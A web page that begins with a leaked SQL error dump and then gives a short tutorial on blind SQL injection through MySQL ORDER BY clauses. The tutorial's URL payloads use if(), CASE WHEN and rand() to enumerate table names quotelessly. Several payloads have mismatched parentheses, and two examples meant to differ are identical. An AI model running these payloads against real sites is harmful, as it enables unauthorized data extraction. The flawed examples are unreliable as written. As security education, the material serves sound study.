Unknown column 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in 'order clause' SQL=SELECT a.id, a.title, a.alias, a.title_alias, a.introtext, a.catid, a.created, a.created_by, a.created_by_alias, CASE WHEN a.modified = 0 THEN a.created ELSE a.modified END as modified, a.modified_by, uam.name as modified_by_name,CASE WHEN a.publish_up = 0 THEN a.created ELSE a.publish_up END as publish_up, a.publish_down, a.attribs, a.metadata, a.metakey, a.metadesc, a.access, a.hits, a.xreference, a.featured, LENGTH(a.fulltext) AS readmore ,CASE WHEN badcats.id is not null THEN 0 ELSE a.state END AS state,c.title AS category_title, c.path AS category_route, c.access AS category_access, c.alias AS category_alias,CASE WHEN a.created_by_alias > ' ' THEN a.created_by_alias ELSE ua.name END AS author,ua.email AS author_email,contact.id as contactid,parent.title as parent_title, parent.id as parent_id, parent.path as parent_route, parent.alias as parent_alias,ROUND( v.rating_sum / v.rating_count ) AS rating, v.rating_count as rating_count,c.published, CASE WHEN badcats.id is null THEN c.published ELSE 0 END AS parents_published FROM anh_content AS a LEFT JOIN anh_content_frontpage AS fp ON fp.content_id = a.id LEFT JOIN anh_categories AS c ON c.id = a.catid LEFT JOIN anh_users AS ua ON ua.id = a.created_by LEFT JOIN anh_users AS uam ON uam.id = a.modified_by LEFT JOIN anh_contact_details AS contact on contact.user_id = a.created_by LEFT JOIN anh_categories as parent ON parent.id = c.parent_id LEFT JOIN anh_content_rating AS v ON a.id = v.content_id LEFT OUTER JOIN (SELECT cat.id as id FROM anh_categories AS cat JOIN anh_categories AS parent ON cat.lft BETWEEN parent.lft AND parent.rgt WHERE parent.extension = 'com_content' AND parent.published != 1 GROUP BY cat.id ) AS badcats ON badcats.id = c.id WHERE a.access IN (1,1) AND CASE WHEN badcats.id is null THEN a.state ELSE 0 END = 1 AND (a.publish_up = '0000-00-00 00:00:00' OR a.publish_up <= '2011-03-19 10:48:10') AND (a.publish_down = '0000-00-00 00:00:00' OR a.publish_down >= '2011-03-19 10:48:10') ORDER BY AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA , 2, c.lft, fp.ordering, a.created ASC LIMIT 4, 3
 

eXploiting SQL injection in ORDER BY clause (MySQL 5)
by Jacco van Tuijl

This URL will show a list orderd by column 1 :

http://www.test.com/list.php?orderby=1

This is what the SQL query that is executed on the database might look like:
SELECT id,name,price FROM list ORDER BY 1

If it would be vulnerable to SQL injection we could try :

http://www.test.com/list.php?orderby=if(true,id,price)

and

http://www.test.com/list.php?orderby=if(false,id,price)

to see if they give a different result

or

http://www.test.com/list.php?orderby=(select case when (true) then id else price end)
and
http://www.test.com/list.php?orderby=(select case when (true) then id else price end)
to see if they give a different result.

If they do give a different result you might be able to enumerate the first char of the table_name in information_schema.tables like this:
http://www.test.com/list.php?orderby=if((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128),id,price)
and this:
http://www.test.com/list.php?orderby=(select case when ((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128) then id else price end)

The backside of these methods is that they require knowlage of the column names.
So I worked out some different method that doesn't require knowlage about column names.

ORDER BY rand()

We can make a request like this:

http://www.test.com/list.php?orderby=rand(true)

returns a different result then this request:

http://www.test.com/list.php?orderby=rand(false)

We can use it to enumerate the first char of the table_name in information_schema.tables like this:
http://www.test.com/list.php?orderby=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=12

And it is all quoteless!

Greetingz,
Jacco van Tuijl